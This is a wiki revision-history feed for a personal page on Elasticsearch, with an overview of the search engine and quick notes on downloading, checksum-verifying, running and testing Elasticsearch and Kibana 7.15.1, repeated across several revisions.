Elasticsearch uses Lucene and tries to make all its features available through the JSON and Java API. It supports facetting and percolating, which can be useful for notifying if new documents match for registered queries.&lt;br /&gt;
&lt;br /&gt;
Another feature is called &amp;quot;gateway&amp;quot; and handles the long-term persistence of the index;[6] for example, an index can be recovered from the gateway in the event of a server crash. Elasticsearch supports real-time GET requests, which makes it suitable as a NoSQL datastore, but it lacks distributed transactions.&lt;br /&gt;
&lt;br /&gt;
===Apache Lucene===&lt;br /&gt;
&lt;br /&gt;
===Kibana===&lt;br /&gt;
&lt;br /&gt;
===NoSQL===&lt;br /&gt;
&lt;br /&gt;
=ElasticSearch Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
elesticsearch installation : https://www.elastic.co/guide/en/elasticsearch/reference/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# shasum -a 512 -c elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# tar -xzf elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd elasticsearch-7.15.1/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enable automatic creation of system indicesedit&lt;br /&gt;
action.auto_create_index: .monitoring*,.watches,.triggered_watches,.watcher-history*,.ml*&lt;br /&gt;
*  &amp;gt; you may consider setting the value to * which will allow automatic creation of all indices.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Running Elasticsearch from the command line&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Test elasticsearch installation&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -X GET &amp;quot;localhost:9200/?pretty&amp;quot;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Running as a daemon&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch -d -p pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# pkill -F pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/blog/running-elasticsearch-on-aws&lt;br /&gt;
&lt;br /&gt;
=Kibana Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/guide/en/kibana/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -O https://artifacts.elastic.co/downloads/kibana/kibana-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# curl https://artifacts.elastic.co/downloads/kibana/kibana-7.15.1-linux-x86_64.tar.gz.sha512 | shasum -a 512 -c -&lt;br /&gt;
# tar -xzf kibana-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd kibana-7.15.1-linux-x86_64/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1107</id>
		<title>Elastic Search</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1107"/>
		<updated>2021-10-27T15:44:22Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: /* ElasticSearch Quick Notes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Elasticsearch is a search engine based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Official clients are available in Java, .NET (C#), PHP, Python, Apache Groovy, Ruby and many other languages.[2] According to the DB-Engines ranking, Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch is developed alongside a data-collection and log-parsing engine called Logstash, and an analytics and visualisation platform called Kibana. The three products are designed for use as an integrated solution, referred to as the &amp;quot;Elastic Stack&amp;quot; (formerly the &amp;quot;ELK stack&amp;quot;).&lt;br /&gt;
&lt;br /&gt;
Elasticsearch can be used to search all kinds of documents. It provides scalable search, has near real-time search, and supports multitenancy. &amp;quot;Elasticsearch is distributed, which means that indices can be divided into shards and each shard can have zero or more replicas. Each node hosts one or more shards, and acts as a coordinator to delegate operations to the correct shard(s). Rebalancing and routing are done automatically&amp;quot;.[2] Related data is often stored in the same index, which consists of one or more primary shards, and zero or more replica shards. Once an index has been created, the number of primary shards cannot be changed.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch uses Lucene and tries to make all its features available through the JSON and Java API. It supports facetting and percolating, which can be useful for notifying if new documents match for registered queries.&lt;br /&gt;
&lt;br /&gt;
Another feature is called &amp;quot;gateway&amp;quot; and handles the long-term persistence of the index;[6] for example, an index can be recovered from the gateway in the event of a server crash. Elasticsearch supports real-time GET requests, which makes it suitable as a NoSQL datastore, but it lacks distributed transactions.&lt;br /&gt;
&lt;br /&gt;
===Apache Lucene===&lt;br /&gt;
&lt;br /&gt;
===Kibana===&lt;br /&gt;
&lt;br /&gt;
===NoSQL===&lt;br /&gt;
&lt;br /&gt;
=ElasticSearch Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
elesticsearch installation : https://www.elastic.co/guide/en/elasticsearch/reference/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# shasum -a 512 -c elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# tar -xzf elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd elasticsearch-7.15.1/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enable automatic creation of system indicesedit&lt;br /&gt;
action.auto_create_index: .monitoring*,.watches,.triggered_watches,.watcher-history*,.ml*&lt;br /&gt;
*  &amp;gt; you may consider setting the value to * which will allow automatic creation of all indices.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Running Elasticsearch from the command line&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Test elasticsearch installation&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -X GET &amp;quot;localhost:9200/?pretty&amp;quot;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Running as a daemon&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch -d -p pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# pkill -F pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/blog/running-elasticsearch-on-aws&lt;br /&gt;
&lt;br /&gt;
to find a port&lt;br /&gt;
&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
#lsof -i :9200&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1106</id>
		<title>Elastic Search</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1106"/>
		<updated>2021-10-27T15:40:24Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: /* ElasticSearch Quick Notes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Elasticsearch is a search engine based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Official clients are available in Java, .NET (C#), PHP, Python, Apache Groovy, Ruby and many other languages.[2] According to the DB-Engines ranking, Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch is developed alongside a data-collection and log-parsing engine called Logstash, and an analytics and visualisation platform called Kibana. The three products are designed for use as an integrated solution, referred to as the &amp;quot;Elastic Stack&amp;quot; (formerly the &amp;quot;ELK stack&amp;quot;).&lt;br /&gt;
&lt;br /&gt;
Elasticsearch can be used to search all kinds of documents. It provides scalable search, has near real-time search, and supports multitenancy. &amp;quot;Elasticsearch is distributed, which means that indices can be divided into shards and each shard can have zero or more replicas. Each node hosts one or more shards, and acts as a coordinator to delegate operations to the correct shard(s). Rebalancing and routing are done automatically&amp;quot;.[2] Related data is often stored in the same index, which consists of one or more primary shards, and zero or more replica shards. Once an index has been created, the number of primary shards cannot be changed.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch uses Lucene and tries to make all its features available through the JSON and Java API. It supports facetting and percolating, which can be useful for notifying if new documents match for registered queries.&lt;br /&gt;
&lt;br /&gt;
Another feature is called &amp;quot;gateway&amp;quot; and handles the long-term persistence of the index;[6] for example, an index can be recovered from the gateway in the event of a server crash. Elasticsearch supports real-time GET requests, which makes it suitable as a NoSQL datastore, but it lacks distributed transactions.&lt;br /&gt;
&lt;br /&gt;
===Apache Lucene===&lt;br /&gt;
&lt;br /&gt;
===Kibana===&lt;br /&gt;
&lt;br /&gt;
===NoSQL===&lt;br /&gt;
&lt;br /&gt;
=ElasticSearch Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
elesticsearch installation : https://www.elastic.co/guide/en/elasticsearch/reference/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# shasum -a 512 -c elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# tar -xzf elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd elasticsearch-7.15.1/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enable automatic creation of system indicesedit&lt;br /&gt;
action.auto_create_index: .monitoring*,.watches,.triggered_watches,.watcher-history*,.ml*&lt;br /&gt;
*  &amp;gt; you may consider setting the value to * which will allow automatic creation of all indices.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Running Elasticsearch from the command line&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Test elasticsearch installation&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -X GET &amp;quot;localhost:9200/?pretty&amp;quot;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Running as a daemon&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch -d -p pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# pkill -F pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/blog/running-elasticsearch-on-aws&lt;br /&gt;
&lt;br /&gt;
to find a port&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
#lsof -i :9200&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1105</id>
		<title>Elastic Search</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1105"/>
		<updated>2021-10-27T15:20:16Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: /* Installation */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Elasticsearch is a search engine based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Official clients are available in Java, .NET (C#), PHP, Python, Apache Groovy, Ruby and many other languages.[2] According to the DB-Engines ranking, Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch is developed alongside a data-collection and log-parsing engine called Logstash, and an analytics and visualisation platform called Kibana. The three products are designed for use as an integrated solution, referred to as the &amp;quot;Elastic Stack&amp;quot; (formerly the &amp;quot;ELK stack&amp;quot;).&lt;br /&gt;
&lt;br /&gt;
Elasticsearch can be used to search all kinds of documents. It provides scalable search, has near real-time search, and supports multitenancy. &amp;quot;Elasticsearch is distributed, which means that indices can be divided into shards and each shard can have zero or more replicas. Each node hosts one or more shards, and acts as a coordinator to delegate operations to the correct shard(s). Rebalancing and routing are done automatically&amp;quot;.[2] Related data is often stored in the same index, which consists of one or more primary shards, and zero or more replica shards. Once an index has been created, the number of primary shards cannot be changed.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch uses Lucene and tries to make all its features available through the JSON and Java API. It supports facetting and percolating, which can be useful for notifying if new documents match for registered queries.&lt;br /&gt;
&lt;br /&gt;
Another feature is called &amp;quot;gateway&amp;quot; and handles the long-term persistence of the index;[6] for example, an index can be recovered from the gateway in the event of a server crash. Elasticsearch supports real-time GET requests, which makes it suitable as a NoSQL datastore, but it lacks distributed transactions.&lt;br /&gt;
&lt;br /&gt;
===Apache Lucene===&lt;br /&gt;
&lt;br /&gt;
===Kibana===&lt;br /&gt;
&lt;br /&gt;
===NoSQL===&lt;br /&gt;
&lt;br /&gt;
=ElasticSearch Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
elesticsearch installation : https://www.elastic.co/guide/en/elasticsearch/reference/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# shasum -a 512 -c elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# tar -xzf elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd elasticsearch-7.15.1/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enable automatic creation of system indicesedit&lt;br /&gt;
action.auto_create_index: .monitoring*,.watches,.triggered_watches,.watcher-history*,.ml*&lt;br /&gt;
*  &amp;gt; you may consider setting the value to * which will allow automatic creation of all indices.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Running Elasticsearch from the command line&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Test elasticsearch installation&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -X GET &amp;quot;localhost:9200/?pretty&amp;quot;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Running as a daemon&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch -d -p pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# pkill -F pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/blog/running-elasticsearch-on-aws&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1104</id>
		<title>Elastic Search</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1104"/>
		<updated>2021-10-27T15:19:47Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: /* Installation */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Elasticsearch is a search engine based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Official clients are available in Java, .NET (C#), PHP, Python, Apache Groovy, Ruby and many other languages.[2] According to the DB-Engines ranking, Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch is developed alongside a data-collection and log-parsing engine called Logstash, and an analytics and visualisation platform called Kibana. The three products are designed for use as an integrated solution, referred to as the &amp;quot;Elastic Stack&amp;quot; (formerly the &amp;quot;ELK stack&amp;quot;).&lt;br /&gt;
&lt;br /&gt;
Elasticsearch can be used to search all kinds of documents. It provides scalable search, has near real-time search, and supports multitenancy. &amp;quot;Elasticsearch is distributed, which means that indices can be divided into shards and each shard can have zero or more replicas. Each node hosts one or more shards, and acts as a coordinator to delegate operations to the correct shard(s). Rebalancing and routing are done automatically&amp;quot;.[2] Related data is often stored in the same index, which consists of one or more primary shards, and zero or more replica shards. Once an index has been created, the number of primary shards cannot be changed.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch uses Lucene and tries to make all its features available through the JSON and Java API. It supports facetting and percolating, which can be useful for notifying if new documents match for registered queries.&lt;br /&gt;
&lt;br /&gt;
Another feature is called &amp;quot;gateway&amp;quot; and handles the long-term persistence of the index;[6] for example, an index can be recovered from the gateway in the event of a server crash. Elasticsearch supports real-time GET requests, which makes it suitable as a NoSQL datastore, but it lacks distributed transactions.&lt;br /&gt;
&lt;br /&gt;
===Apache Lucene===&lt;br /&gt;
&lt;br /&gt;
===Kibana===&lt;br /&gt;
&lt;br /&gt;
===NoSQL===&lt;br /&gt;
&lt;br /&gt;
=ElasticSearch Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
elesticsearch installation : https://www.elastic.co/guide/en/elasticsearch/reference/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# shasum -a 512 -c elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# tar -xzf elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd elasticsearch-7.15.1/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enable automatic creation of system indicesedit&lt;br /&gt;
action.auto_create_index: .monitoring*,.watches,.triggered_watches,.watcher-history*,.ml*&lt;br /&gt;
*  &amp;gt; you may consider setting the value to * which will allow automatic creation of all indices.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Running Elasticsearch from the command line&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1103</id>
		<title>Elastic Search</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1103"/>
		<updated>2021-10-27T15:19:18Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: /* Installation */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Elasticsearch is a search engine based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Official clients are available in Java, .NET (C#), PHP, Python, Apache Groovy, Ruby and many other languages.[2] According to the DB-Engines ranking, Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch is developed alongside a data-collection and log-parsing engine called Logstash, and an analytics and visualisation platform called Kibana. The three products are designed for use as an integrated solution, referred to as the &amp;quot;Elastic Stack&amp;quot; (formerly the &amp;quot;ELK stack&amp;quot;).&lt;br /&gt;
&lt;br /&gt;
Elasticsearch can be used to search all kinds of documents. It provides scalable search, has near real-time search, and supports multitenancy. &amp;quot;Elasticsearch is distributed, which means that indices can be divided into shards and each shard can have zero or more replicas. Each node hosts one or more shards, and acts as a coordinator to delegate operations to the correct shard(s). Rebalancing and routing are done automatically&amp;quot;.[2] Related data is often stored in the same index, which consists of one or more primary shards, and zero or more replica shards. Once an index has been created, the number of primary shards cannot be changed.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch uses Lucene and tries to make all its features available through the JSON and Java API. It supports facetting and percolating, which can be useful for notifying if new documents match for registered queries.&lt;br /&gt;
&lt;br /&gt;
Another feature is called &amp;quot;gateway&amp;quot; and handles the long-term persistence of the index;[6] for example, an index can be recovered from the gateway in the event of a server crash. Elasticsearch supports real-time GET requests, which makes it suitable as a NoSQL datastore, but it lacks distributed transactions.&lt;br /&gt;
&lt;br /&gt;
===Apache Lucene===&lt;br /&gt;
&lt;br /&gt;
===Kibana===&lt;br /&gt;
&lt;br /&gt;
===NoSQL===&lt;br /&gt;
&lt;br /&gt;
=ElasticSearch Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
elesticsearch installation : https://www.elastic.co/guide/en/elasticsearch/reference/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# shasum -a 512 -c elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# tar -xzf elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd elasticsearch-7.15.1/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enable automatic creation of system indicesedit&lt;br /&gt;
action.auto_create_index: .monitoring*,.watches,.triggered_watches,.watcher-history*,.ml*&lt;br /&gt;
*  &amp;gt; you may consider setting the value to * which will allow automatic creation of all indices.&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1102</id>
		<title>Elastic Search</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1102"/>
		<updated>2021-10-27T15:15:39Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: /* Installation */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Elasticsearch is a search engine based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Official clients are available in Java, .NET (C#), PHP, Python, Apache Groovy, Ruby and many other languages.[2] According to the DB-Engines ranking, Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch is developed alongside a data-collection and log-parsing engine called Logstash, and an analytics and visualisation platform called Kibana. The three products are designed for use as an integrated solution, referred to as the &amp;quot;Elastic Stack&amp;quot; (formerly the &amp;quot;ELK stack&amp;quot;).&lt;br /&gt;
&lt;br /&gt;
Elasticsearch can be used to search all kinds of documents. It provides scalable search, has near real-time search, and supports multitenancy. &amp;quot;Elasticsearch is distributed, which means that indices can be divided into shards and each shard can have zero or more replicas. Each node hosts one or more shards, and acts as a coordinator to delegate operations to the correct shard(s). Rebalancing and routing are done automatically&amp;quot;.[2] Related data is often stored in the same index, which consists of one or more primary shards, and zero or more replica shards. Once an index has been created, the number of primary shards cannot be changed.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch uses Lucene and tries to make all its features available through the JSON and Java API. It supports facetting and percolating, which can be useful for notifying if new documents match for registered queries.&lt;br /&gt;
&lt;br /&gt;
Another feature is called &amp;quot;gateway&amp;quot; and handles the long-term persistence of the index;[6] for example, an index can be recovered from the gateway in the event of a server crash. Elasticsearch supports real-time GET requests, which makes it suitable as a NoSQL datastore, but it lacks distributed transactions.&lt;br /&gt;
&lt;br /&gt;
===Apache Lucene===&lt;br /&gt;
&lt;br /&gt;
===Kibana===&lt;br /&gt;
&lt;br /&gt;
===NoSQL===&lt;br /&gt;
&lt;br /&gt;
=ElasticSearch Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
elesticsearch installation : https://www.elastic.co/guide/en/elasticsearch/reference/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Enable automatic creation of system indicesedit&lt;br /&gt;
action.auto_create_index: .monitoring*,.watches,.triggered_watches,.watcher-history*,.ml*&lt;br /&gt;
*  &amp;gt; you may consider setting the value to * which will allow automatic creation of all indices.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Running Elasticsearch from the command line&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
Test elasticsearch installation&lt;br /&gt;
&lt;br /&gt;
Running as a daemon&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/blog/running-elasticsearch-on-aws&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# shasum -a 512 -c elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# tar -xzf elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd elasticsearch-7.15.1/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1101</id>
		<title>Elastic Search</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1101"/>
		<updated>2021-10-27T14:26:01Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: /* Installation */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Elasticsearch is a search engine based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Official clients are available in Java, .NET (C#), PHP, Python, Apache Groovy, Ruby and many other languages.[2] According to the DB-Engines ranking, Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch is developed alongside a data-collection and log-parsing engine called Logstash, and an analytics and visualisation platform called Kibana. The three products are designed for use as an integrated solution, referred to as the &amp;quot;Elastic Stack&amp;quot; (formerly the &amp;quot;ELK stack&amp;quot;).&lt;br /&gt;
&lt;br /&gt;
Elasticsearch can be used to search all kinds of documents. It provides scalable search, has near real-time search, and supports multitenancy. &amp;quot;Elasticsearch is distributed, which means that indices can be divided into shards and each shard can have zero or more replicas. Each node hosts one or more shards, and acts as a coordinator to delegate operations to the correct shard(s). Rebalancing and routing are done automatically&amp;quot;.[2] Related data is often stored in the same index, which consists of one or more primary shards, and zero or more replica shards. Once an index has been created, the number of primary shards cannot be changed.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch uses Lucene and tries to make all its features available through the JSON and Java API. It supports facetting and percolating, which can be useful for notifying if new documents match for registered queries.&lt;br /&gt;
&lt;br /&gt;
Another feature is called &amp;quot;gateway&amp;quot; and handles the long-term persistence of the index;[6] for example, an index can be recovered from the gateway in the event of a server crash. Elasticsearch supports real-time GET requests, which makes it suitable as a NoSQL datastore, but it lacks distributed transactions.&lt;br /&gt;
&lt;br /&gt;
===Apache Lucene===&lt;br /&gt;
&lt;br /&gt;
===Kibana===&lt;br /&gt;
&lt;br /&gt;
===NoSQL===&lt;br /&gt;
&lt;br /&gt;
=ElasticSearch Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
